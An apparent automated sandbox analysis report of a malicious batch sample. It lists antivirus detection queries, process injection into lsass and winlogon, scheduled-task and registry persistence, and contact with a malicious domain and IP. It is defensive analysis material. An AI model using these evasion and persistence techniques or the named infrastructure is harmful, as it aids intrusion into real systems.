Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-U7ejKPED VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\$rbx-U7ejKPED VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 37_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 37_2_0000000140002300
Source: C:\Windows\System32\cmd.exe Code function: 18_2_0000022123C28090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 18_2_0000022123C28090
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.10.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: dllhost.exe, Amcache.hve.10.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.49.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525388 Sample: 1.cmd Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 81 azure-winsecure.com 2->81 91 Multi AV Scanner detection for domain / URL 2->91 93 Malicious sample detected (through community Yara rule) 2->93 95 .NET source code references suspicious native API functions 2->95 97 14 other signatures 2->97 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 127 Suspicious powershell command line found 13->127 129 Suspicious command line found 13->129 18 powershell.exe 36 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 131 Writes to foreign memory regions 16->131 133 Modifies the context of a thread in another process (thread injection) 16->133 135 Found suspicious powershell code related to unpacking or dynamic code loading 16->135 137 Injects a PE file into a foreign processes 16->137 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 79 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 18->79 dropped 99 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->99 101 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->101 103 Uses schtasks.exe or at.exe to add and modify task schedules 18->103 111 4 other signatures 18->111 32 cmd.exe 1 18->32         started        35 WerFault.exe 20 16 18->35         started        105 Injects code into the Windows Explorer (explorer.exe) 26->105 107 Contains functionality to inject code into remote processes 26->107 109 Writes to foreign memory regions 26->109 113 3 other signatures 26->113 37 lsass.exe 26->37 injected 39 winlogon.exe 26->39 injected 41 svchost.exe 26->41 injected 43 20 other processes 26->43 signatures8 process9 signatures10 85 Suspicious powershell command line found 32->85 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        87 Writes to foreign memory regions 37->87 process11 process12 51 cmd.exe 1 45->51         started        signatures13 115 Suspicious powershell command line found 51->115 117 Suspicious command line found 51->117 54 powershell.exe 51->54         started        58 conhost.exe 51->58         started        60 WMIC.exe 1 51->60         started        62 4 other processes 51->62 process14 dnsIp15 83 azure-winsecure.com 192.64.119.55, 49861, 50013, 50014 NAMECHEAP-NETUS United States 54->83 119 Creates autostart registry keys with suspicious values (likely registry only malware) 54->119 121 Creates autostart registry keys with suspicious names 54->121 123 Creates an autostart registry key pointing to binary in C:\Windows 54->123 125 7 other signatures 54->125 64 powershell.exe 54->64         started        67 schtasks.exe 54->67         started        69 WerFault.exe 54->69         started        71 WerFault.exe 54->71         started        signatures16 process17 signatures18 89 Injects a PE file into a foreign processes 64->89 73 conhost.exe 64->73         started        75 powershell.exe 64->75         started        77 conhost.exe 67->77         started        process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
192.64.119.55
 azure-winsecure.com United States
22612 NAMECHEAP-NETUS false

Contacted Domains

Name IP Active
azure-winsecure.com 192.64.119.55 true